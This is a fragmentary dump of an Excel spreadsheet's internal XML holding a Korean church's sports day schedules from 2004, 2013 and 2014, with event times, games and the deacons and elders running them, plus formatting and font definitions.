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8550" activeTab="2"/>
  </bookViews>
  <sheets>
    <sheet name="체육대회시간표및진행자" sheetId="1" r:id="rId1"/>
    <sheet name="체육대회시간표및진행자 (2)" sheetId="2" r:id="rId2"/>
    <sheet name="체육대회시간표및진행자 (3)" sheetId="3" r:id="rId3"/>
    <sheet name="Sheet2" sheetId="4" r:id="rId4"/>
    <sheet name="Sheet3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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="242" uniqueCount="191">
  <si>
    <t>순서</t>
  </si>
  <si>
    <t>시간</t>
  </si>
  <si>
    <t>프로그램</t>
  </si>
  <si>
    <t>대상</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>교회학교친구들</t>
  </si>
  <si>
    <t>요              령</t>
  </si>
  <si>
    <t>명성교회</t>
  </si>
  <si>
    <t>2004.      5.      26.</t>
  </si>
  <si>
    <t>전교인</t>
  </si>
  <si>
    <t>전교인 교구별 게임</t>
  </si>
  <si>
    <t>남자성도</t>
  </si>
  <si>
    <t>여성도</t>
  </si>
  <si>
    <t>주일학교 자체게임</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>교구별 경기</t>
  </si>
  <si>
    <t>1회전 승리팀 발야구 결승(5회전)</t>
  </si>
  <si>
    <t>팀별 리그(1.2.3.4.교구별 토너먼트)</t>
  </si>
  <si>
    <t>여성 줄넘기(진행:김종철집사)</t>
  </si>
  <si>
    <t>여자 발야구예선(진행:강신혁집사)</t>
  </si>
  <si>
    <t>쌍쌍피구 예선 (진행:신위식집사)</t>
  </si>
  <si>
    <t xml:space="preserve">  줄다리기(진행:이승민집사)</t>
  </si>
  <si>
    <t>축구 결승(진행:정재현집사)</t>
  </si>
  <si>
    <t>릴레이(교구별 선수)(진행:한용석집사)</t>
  </si>
  <si>
    <t>교구별 여성도 12명 남자2명</t>
  </si>
  <si>
    <t xml:space="preserve">   주일학교 차체적으로 게임진행     (교사와함께)</t>
  </si>
  <si>
    <t>양팀나누어서(전후반15분씩)</t>
  </si>
  <si>
    <t xml:space="preserve">   주일학교 차체적으로 게임진행     (교사와함께)</t>
  </si>
  <si>
    <t>교회학교 어린이 대상</t>
  </si>
  <si>
    <t>폐회 예배 및 시상</t>
  </si>
  <si>
    <t xml:space="preserve"> 열    린       예    배</t>
  </si>
  <si>
    <t>09:00~09:20</t>
  </si>
  <si>
    <t>09:25~09:55</t>
  </si>
  <si>
    <t>10:00~10:30</t>
  </si>
  <si>
    <t>10:30~11:15</t>
  </si>
  <si>
    <t>11:20~12:00</t>
  </si>
  <si>
    <t>12:00~12:55</t>
  </si>
  <si>
    <t>13:00~13:40</t>
  </si>
  <si>
    <t>13:45~14:00</t>
  </si>
  <si>
    <t>14:05~14:35</t>
  </si>
  <si>
    <t>14:40~14:50</t>
  </si>
  <si>
    <t>14:55~15:25</t>
  </si>
  <si>
    <t>15:30~15:50</t>
  </si>
  <si>
    <t>15:55~16:30</t>
  </si>
  <si>
    <t>16:30~</t>
  </si>
  <si>
    <t>주일학교 자체게임</t>
  </si>
  <si>
    <t>여자 발야구예선(진행:강신혁집사)</t>
  </si>
  <si>
    <t>쌍쌍피구 예선 (진행:신위식집사)</t>
  </si>
  <si>
    <t>⊙농구</t>
  </si>
  <si>
    <t>고등부</t>
  </si>
  <si>
    <t>즐거운 점심시간</t>
  </si>
  <si>
    <t>전체</t>
  </si>
  <si>
    <t>배구 결승전(진행:최재원집사)</t>
  </si>
  <si>
    <t>쌍쌍피구 결승(진행:신위식집사)</t>
  </si>
  <si>
    <t>여자 발야구 결승(진행:강신혁집사)</t>
  </si>
  <si>
    <t>남자 족구(번외경기)(진행:김기태집사)</t>
  </si>
  <si>
    <t>주일학교 자체게임</t>
  </si>
  <si>
    <t>미니올림픽(정기남집사)</t>
  </si>
  <si>
    <t>전체</t>
  </si>
  <si>
    <t>식사 및 나눔에 시간(감사의 시간)</t>
  </si>
  <si>
    <t>1회전 승리팀 (결승전)</t>
  </si>
  <si>
    <t>1회전 승리팀 결승전 (전.후반 30분)</t>
  </si>
  <si>
    <t>축구 예선 1.2교구 정재현집사 (전.후반 30분)★ 주일학교 자체게임(교사진행)</t>
  </si>
  <si>
    <t>축구 예선 3.4교구 최경호 집사(전.후반 30분)</t>
  </si>
  <si>
    <t>1.4교구 배구예선(진행:최재원집사)</t>
  </si>
  <si>
    <t>1.4 교구 배구예선 (1)15점 3셋트</t>
  </si>
  <si>
    <t>2.3교구 배구예선(진행:최재원집사)</t>
  </si>
  <si>
    <t>2.3 교구 배구예선 (2) 15점 3셋트</t>
  </si>
  <si>
    <r>
      <t>1.3 교구 예선</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="새굴림"/>
        <family val="1"/>
      </rPr>
      <t>(배구및발야구 경기후 시간이되면)</t>
    </r>
  </si>
  <si>
    <t>1.4 교구 발야구 예선 2 (5회전)</t>
  </si>
  <si>
    <r>
      <t>2.4 교구예선</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="새굴림"/>
        <family val="1"/>
      </rPr>
      <t>(배구및발야구 경기후 시간이되면)</t>
    </r>
  </si>
  <si>
    <t>2.3 교구 발야구 예선 1 (5회전)</t>
  </si>
  <si>
    <t>보물찾기(진행:최보웅집사)</t>
  </si>
  <si>
    <t xml:space="preserve">   주일학교 차체적으로 게임진행(교사와함께)</t>
  </si>
  <si>
    <t>명성교회</t>
  </si>
  <si>
    <t>순서</t>
  </si>
  <si>
    <t>시간</t>
  </si>
  <si>
    <t>프로그램</t>
  </si>
  <si>
    <t>대상</t>
  </si>
  <si>
    <t>요              령</t>
  </si>
  <si>
    <t xml:space="preserve"> 열    린       예    배</t>
  </si>
  <si>
    <t>10:00~10:30</t>
  </si>
  <si>
    <t>여성도</t>
  </si>
  <si>
    <t>교회학교친구들</t>
  </si>
  <si>
    <t>⊙농구</t>
  </si>
  <si>
    <t>양팀나누어서(전후반15분씩)</t>
  </si>
  <si>
    <t>즐거운 점심시간</t>
  </si>
  <si>
    <t>전체</t>
  </si>
  <si>
    <t>식사 및 나눔에 시간(감사의 시간)</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>남자성도</t>
  </si>
  <si>
    <t>전교인 교구별 게임</t>
  </si>
  <si>
    <t>15:55~16:30</t>
  </si>
  <si>
    <t>보물찾기(진행:최보웅집사)</t>
  </si>
  <si>
    <t>교회학교 어린이 대상</t>
  </si>
  <si>
    <t>미니올림픽(정기남집사)</t>
  </si>
  <si>
    <t>전교인</t>
  </si>
  <si>
    <t>16:30~</t>
  </si>
  <si>
    <t>폐회 예배 및 시상</t>
  </si>
  <si>
    <t>2013.      10.      03.</t>
  </si>
  <si>
    <t>09:00~09:30</t>
  </si>
  <si>
    <t>09:30~10:00</t>
  </si>
  <si>
    <t>여성 줄넘기(진행: 0 0 0 집사)</t>
  </si>
  <si>
    <t>평원별 여성도 12명 남자2명</t>
  </si>
  <si>
    <t>주일학교 게임</t>
  </si>
  <si>
    <t xml:space="preserve">   주일학교  게임진행     (교사와함께)</t>
  </si>
  <si>
    <t>1.2평원3.4 평원 배구15점 3셋트</t>
  </si>
  <si>
    <t>1.2평원/3.4평원 (전.후반 30분)</t>
  </si>
  <si>
    <t>체육대회 진행시간표.xls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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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어린이 축구  1.2평원/34평원 정재현집사 (전.후반 15분)</t>
  </si>
  <si>
    <t>여자 발야구 (진행: 0 0 0 집사)</t>
  </si>
  <si>
    <t>1.2/3.4 평원 발야구   (5회전)</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1.2/3.4 평원 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="새굴림"/>
        <family val="1"/>
      </rPr>
      <t>(목사부부.장로2가정.새가족2가정.성도5쌍)</t>
    </r>
  </si>
  <si>
    <t>1.2평원3.4 평원 족구15점 3셋트</t>
  </si>
  <si>
    <t>청.백 배구(진행: 0 0 0 집사)</t>
  </si>
  <si>
    <t>청.백 족구(진행: 0 0 0 집사)</t>
  </si>
  <si>
    <t>가족 게임(전가족 대상)</t>
  </si>
  <si>
    <t>청/백 쌍쌍피구  (진행:신위식집사)</t>
  </si>
  <si>
    <t>10:30~11:30</t>
  </si>
  <si>
    <t>11:30~12:20</t>
  </si>
  <si>
    <t>12:20~13:30</t>
  </si>
  <si>
    <t>13:30~14:20</t>
  </si>
  <si>
    <t>14:20~15:00</t>
  </si>
  <si>
    <t>청소년부</t>
  </si>
  <si>
    <t>청소년부 축구  1.2평원/34평원 정재현집사 (전.후반 15분)</t>
  </si>
  <si>
    <t>15:00~15:30</t>
  </si>
  <si>
    <t>15:30~15:50</t>
  </si>
  <si>
    <t xml:space="preserve">  줄다리기(진행: 0 0 0 집사)</t>
  </si>
  <si>
    <t>청/백(3전 2승)주일학생~장년참여</t>
  </si>
  <si>
    <t>15:50~16:30</t>
  </si>
  <si>
    <t>신발 넣기/멀리차기 등</t>
  </si>
  <si>
    <t>청/백 (주일학생~장년참여)</t>
  </si>
  <si>
    <t>청/백 릴레이(진행: 0 0 0 집사)</t>
  </si>
  <si>
    <t>청/백 축구 (진행: 0 0 0 집사)</t>
  </si>
  <si>
    <t>성경퀴즈/게임.</t>
  </si>
  <si>
    <t>2014.      10.      03.</t>
  </si>
  <si>
    <t>경기
진행자</t>
  </si>
  <si>
    <t>경기 종목</t>
  </si>
  <si>
    <t xml:space="preserve"> (전.후반 15분)</t>
  </si>
  <si>
    <t xml:space="preserve"> 김기태 집사</t>
  </si>
  <si>
    <t xml:space="preserve">어린이 축구 </t>
  </si>
  <si>
    <t>단체 줄넘기</t>
  </si>
  <si>
    <t>평원별 여성도 5명 남자5명(총20명)</t>
  </si>
  <si>
    <t>정재현 집사</t>
  </si>
  <si>
    <t>정진화 집사</t>
  </si>
  <si>
    <t>청.백 배구</t>
  </si>
  <si>
    <t>지영관 장로</t>
  </si>
  <si>
    <t>서용해 집사</t>
  </si>
  <si>
    <t>청.백 족구</t>
  </si>
  <si>
    <t>최경호 집사</t>
  </si>
  <si>
    <t>여자 발야구</t>
  </si>
  <si>
    <t>김태수 집사</t>
  </si>
  <si>
    <t>신위식집사)</t>
  </si>
  <si>
    <t xml:space="preserve">청/백 쌍쌍피구 </t>
  </si>
  <si>
    <t>정기남 장로</t>
  </si>
  <si>
    <t>청/백 20대3명 30대3명 40대3명 50대~2명 (전.후반 30분)</t>
  </si>
  <si>
    <t>청/백 축구</t>
  </si>
  <si>
    <t>류범덕 장로</t>
  </si>
  <si>
    <t>성경퀴즈/게임.오리발 신고 달리기 박 터트리기 등</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">청/백 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="새굴림"/>
        <family val="1"/>
      </rPr>
      <t>(목사1가정.장로2가정.새가족2가정.성도5쌍)</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> (전.후반 15분)</t>
  </si>
  <si>
    <t xml:space="preserve">청소년부 축구  </t>
  </si>
  <si>
    <t xml:space="preserve">  줄다리기</t>
  </si>
  <si>
    <t>번외 릴레이</t>
  </si>
  <si>
    <t>청/백 (유치 남여긱2명/주일학교1~6학년남여각1명/
청소년부남여4명/청년남여2명/장년남여4명)</t>
  </si>
  <si>
    <t>청/백 릴레이</t>
  </si>
  <si>
    <t>전 교인 대상</t>
  </si>
  <si>
    <t>보물찾기</t>
  </si>
  <si>
    <t>행운권 추첨</t>
  </si>
  <si>
    <t>⊙농구 피구</t>
  </si>
  <si>
    <t>청/백 배구15점 3셋트(부교억자1명 새가족3명 여자2명)</t>
  </si>
  <si>
    <t>청/백 족구15점 3셋트( 각5명중새가족2명 여자1명)</t>
  </si>
  <si>
    <t>청/백 발야구  여자성도 9명중 청소년부2명 청년2명 (5회전)</t>
  </si>
  <si>
    <t>양팀나누어서(전후반15분씩)형편에 맞게 진행</t>
  </si>
  <si>
    <t>실버 주일학교 게임</t>
  </si>
  <si>
    <t>공 굴리고 /풍선 크게불기 등(65세 이상)</t>
  </si>
  <si>
    <t>* 모든 게임 시간은 경기 진행 상황에 따라 조정 운영됩니다.</t>
  </si>
  <si>
    <t>* 모든 게임 점수는 승100점 패70점( 매 게임시 새가족 참여+5점 65이상 참여시+5점)</t>
  </si>
  <si>
    <t xml:space="preserve"> 열    린       예    배  (실로암 선교단 축하공연)약 10분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</si>
</sst>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m&quot;/&quot;d;@"/>
    <numFmt numFmtId="178" formatCode="mm&quot;월&quot;\ dd&quot;일&quot;"/>
    <numFmt numFmtId="179" formatCode="mmm/yyyy"/>
    <numFmt numFmtId="180" formatCode="#,##0_ "/>
    <numFmt numFmtId="181" formatCode="_ * #,##0_ ;_ * \-#,##0_ ;_ * &quot;-&quot;_ ;_ @_ "/>
    <numFmt numFmtId="182" formatCode="_ * #,##0.00_ ;_ * \-#,##0.00_ ;_ * &quot;-&quot;??_ ;_ @_ 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_);[Red]\(0\)"/>
    <numFmt numFmtId="186" formatCode="00000000"/>
    <numFmt numFmtId="187" formatCode="&quot;₩&quot;#,##0.00;&quot;₩&quot;\-#,##0.00"/>
    <numFmt numFmtId="188" formatCode="#,##0.0"/>
    <numFmt numFmtId="189" formatCode="&quot;₩&quot;#,##0;&quot;₩&quot;\-#,##0"/>
    <numFmt numFmtId="190" formatCode="&quot;₩&quot;#,##0.00;[Red]&quot;₩&quot;\-#,##0.00"/>
    <numFmt numFmtId="191" formatCode="_ &quot;₩&quot;* #,##0_ ;_ &quot;₩&quot;* \-#,##0_ ;_ &quot;₩&quot;* &quot;-&quot;_ ;_ @_ "/>
    <numFmt numFmtId="192" formatCode="_ &quot;₩&quot;* #,##0.00_ ;_ &quot;₩&quot;* \-#,##0.00_ ;_ &quot;₩&quot;* &quot;-&quot;??_ ;_ @_ "/>
    <numFmt numFmtId="193" formatCode="&quot;₩&quot;#,##0.00\ ;\(&quot;₩&quot;#,##0.00\)"/>
    <numFmt numFmtId="194" formatCode="#,##0;[Red]&quot;△&quot;#,##0"/>
    <numFmt numFmtId="195" formatCode="&quot;$&quot;#,##0.00_);[Red]\(&quot;$&quot;#,##0.00\)"/>
    <numFmt numFmtId="196" formatCode="&quot;₩&quot;#,##0.00;&quot;₩&quot;&quot;₩&quot;\-#,##0.00"/>
    <numFmt numFmtId="197" formatCode="_ &quot;₩&quot;* #,##0.00_ ;_ &quot;₩&quot;* &quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;\-#,##0.00_ ;_ &quot;₩&quot;* &quot;-&quot;??_ ;_ @_ "/>
    <numFmt numFmtId="198" formatCode="_ * #,##0_ ;_ * &quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;\-#,##0_ ;_ * &quot;-&quot;_ ;_ @_ "/>
    <numFmt numFmtId="199" formatCode="_ * #,##0.00_ ;_ * &quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;\-#,##0.00_ ;_ * &quot;-&quot;??_ ;_ @_ "/>
    <numFmt numFmtId="200" formatCode=".00"/>
    <numFmt numFmtId="201" formatCode=";;"/>
    <numFmt numFmtId="202" formatCode="#,##0&quot;%&quot;"/>
    <numFmt numFmtId="203" formatCode="#,##0.0&quot;%&quot;"/>
    <numFmt numFmtId="204" formatCode="&quot;?#,##0;\-&quot;&quot;?&quot;#,##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\]"/>
    <numFmt numFmtId="208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09" formatCode="#."/>
    <numFmt numFmtId="210" formatCode="d"/>
    <numFmt numFmtId="211" formatCode="_-[$€-2]* #,##0.00_-;\-[$€-2]* #,##0.00_-;_-[$€-2]* &quot;-&quot;??_-"/>
    <numFmt numFmtId="212" formatCode="0;[Red]0"/>
    <numFmt numFmtId="213" formatCode="\(#,##0\)"/>
    <numFmt numFmtId="214" formatCode="##,###&quot;㎞&quot;"/>
    <numFmt numFmtId="215" formatCode="yy&quot;-&quot;m&quot;-&quot;d"/>
    <numFmt numFmtId="216" formatCode="&quot;₩&quot;#,##0.00;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;\-#,##0.00"/>
    <numFmt numFmtId="217" formatCode="\$#,##0.0"/>
    <numFmt numFmtId="218" formatCode="#,##0.000"/>
    <numFmt numFmtId="219" formatCode="_-&quot;DM&quot;\ * #,##0_-;\-&quot;DM&quot;\ * #,##0_-;_-&quot;DM&quot;\ * &quot;-&quot;_-;_-@_-"/>
    <numFmt numFmtId="220" formatCode="_-&quot;DM&quot;\ * #,##0.00_-;\-&quot;DM&quot;\ * #,##0.00_-;_-&quot;DM&quot;\ * &quot;-&quot;??_-;_-@_-"/>
    <numFmt numFmtId="221" formatCode="_-* #,##0\ &quot;zł&quot;_-;\-* #,##0\ &quot;zł&quot;_-;_-* &quot;-&quot;\ &quot;zł&quot;_-;_-@_-"/>
    <numFmt numFmtId="222" formatCode="_-* #,##0.00\ &quot;zł&quot;_-;\-* #,##0.00\ &quot;zł&quot;_-;_-* &quot;-&quot;??\ &quot;zł&quot;_-;_-@_-"/>
    <numFmt numFmtId="223" formatCode="_-* #,##0\ _z_ł_-;\-* #,##0\ _z_ł_-;_-* &quot;-&quot;\ _z_ł_-;_-@_-"/>
    <numFmt numFmtId="224" formatCode="_-* #,##0.00\ _z_ł_-;\-* #,##0.00\ _z_ł_-;_-* &quot;-&quot;??\ _z_ł_-;_-@_-"/>
  </numFmts>
  <fonts count="131">
    <font>
      <sz val="11"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="새굴림"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="새굴림"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="새굴림"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="새굴림"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="새굴림"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="Falstaff Festival MT"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <name val="Falstaff Festival MT"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <color indexed="10"/>
      <name val="새굴림"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <name val="새굴림"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <color indexed="12"/>
      <name val="새굴림"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="12"/>
      <name val="새굴림"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="바탕체"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="바탕체"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="¹UAAA¼"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="14"/>
      <name val="??"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="??"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="돋움체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="바탕체"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="굴림체"/>
      <family val="3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4"/>
      <name val="¨?¨Ï"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="18"/>
      <color indexed="24"/>
      <name val="¹UAAA¼"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="15"/>
      <color indexed="24"/>
      <name val="¹UAAA¼"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Helv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sz val="11"/>
      <color indexed="20"/>
      <name val="맑은 고딕"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="돋움체"/>
      <family val="3"/>
    </font>
    <font>
      <u val="single"/>
      <sz val="11"/>
      <color indexed="36"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="14"/>
      <name val="뼥?ⓒ"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="14"/>
      <name val="뼻뮝"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="1"/>
      <color indexed="63"/>
      <name val="Courier"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Times New Roman"/>
      <family val="1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3"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="돋움체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="18"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="52"/>
      <name val="맑은 고딕"/>
      <family val="3"/>
    </font>
    <font>
      <u val="single"/>
      <sz val="8.25"/>
      <color indexed="36"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="8"/>
      <name val="맑은 고딕"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="新細明體"/>
      <family val="1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8.25"/>
      <color indexed="12"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="¨IoUAAA¡§u"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="￥i￠￢￠?oA¨u"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="©öUAAA¨ù"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="￥i￠￢￠?oA¨u"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="ⓒoUAAA¨u"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="￠RIi￠RE￠Rⓒ­￠RE?o"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="¹ÙÅÁÃ¼"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="μ¸¿oA¼"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="μ¸¿o"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="µ¸¿ò"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="μ¸¿oA¼"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="µ¸¿òÃ¼"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="돋움체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="굴림"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="µ¸¿òÃ¼"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="14"/>
      <name val="¾©"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="MS Sans Serif"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="μ¸¿o"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="¸iA¶"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Tms Rmn"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="32"/>
      <name val="MIN 훈민08체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="¡¾¨ù¢¬©÷A¨ù"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="System"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="±¼¸²A¼"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="14"/>
      <name val="±¼¸²Ã¼"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="¹ÙÅÁÃ¼"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="¹UAAA¼"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="±¼¸²A¼"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Times New Roman Tur"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="±A¼­A¼"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="±¼¸²A¼"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="±¼¸²Ã¼"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="¹UAAA¼"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="μ¸¿oA¼"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="µ¸¿òÃ¼"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="±¼¸²A¼"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="¸íÁ¶"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="¹ÙÅÁÃ¼"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="Helv"/>
      <family val="2"/>
    </font>
    <font>
      <u val="single"/>
      <sz val="10"/>
      <color indexed="12"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <i/>
      <sz val="12"/>
      <name val="돋움체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial CE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2"/>
      <color indexed="32"/>
      <name val="모음디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color indexed="18"/>
      <name val="Tahoma"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="8"/>
      <color indexed="20"/>
      <name val="Tahoma"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="¨?¨Ï"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="¾©"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="12"/>
      <name val=".VnTime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새굴림"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color indexed="10"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color indexed="30"/>
      <name val="궁서체"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="24"/>
      <color indexed="8"/>
      <name val="HY헤드라인M"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color rgb="FF0070C0"/>
      <name val="궁서체"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color rgb="FFFF0000"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
  </fonts>
  <fills count="40">
    <fill>
      <patternFill/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="lightGray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dotted"/>
      <bottom style="dotted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44"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15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8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3" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="15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 applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf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190" fontId="20" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="203" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="39" fontId="19" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="204" fontId="20" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="21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4" fontId="20" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="201" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="37" fontId="19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 applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf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 applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="15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7" fontId="19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28" fillId="2" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="2" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
